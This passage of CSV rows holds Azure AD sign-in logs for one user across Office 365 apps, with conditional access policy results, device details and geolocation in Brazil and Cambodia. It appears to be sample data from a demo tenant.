MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",8d371308-4e1f-476f-97d6-c0ea3c4d0800,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,8d371308-4e1f-476f-97d6-c0ea3c4d0800,SigninLogs,Sucess,-20.54751015,-47.4056282
+1631,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:15.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0757aec6-6704-49e0-920d-4afaf0e42b39,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",22fd8c7c-75eb-4549-80fa-1727a5530700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,22fd8c7c-75eb-4549-80fa-1727a5530700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1632,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:14.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,46b4579b-d082-4360-9206-356239630e17,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",8d371308-4e1f-476f-97d6-c0eaac4b0800,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,8d371308-4e1f-476f-97d6-c0eaac4b0800,SigninLogs,Sucess,-20.54751015,-47.4056282
+1633,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:54.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,27eb5e7b-a5a2-4117-83ce-252fdc9aed3e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",3006daeb-4fa9-44e4-baa4-8ca7dc630800,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,3006daeb-4fa9-44e4-baa4-8ca7dc630800,SigninLogs,Sucess,-20.54751015,-47.4056282
+1634,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:28.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,331b8dad-4bd2-4242-b864-f972effdbb38,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:00,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",65ce963c-c870-4311-8389-19e591c70600,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,65ce963c-c870-4311-8389-19e591c70600,SigninLogs,Sucess,13,105
+1635,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:06.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e4b55795-8d88-492d-93ae-096a054df5e6,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",7ad10e9e-8b94-4b07-9307-1c32d21e0700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,7ad10e9e-8b94-4b07-9307-1c32d21e0700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1636,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:20.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f8d03780-1cab-4f5d-ade3-c9e4e9e3908e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",7ad10e9e-8b94-4b07-9307-1c32f21f0700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,7ad10e9e-8b94-4b07-9307-1c32f21f0700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1637,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:01.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5ec34106-ec3f-4c4b-aaa6-b579ed928464,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:00,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",189268ff-d871-4dc4-914e-2c964df70700,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,189268ff-d871-4dc4-914e-2c964df70700,SigninLogs,Sucess,13,105
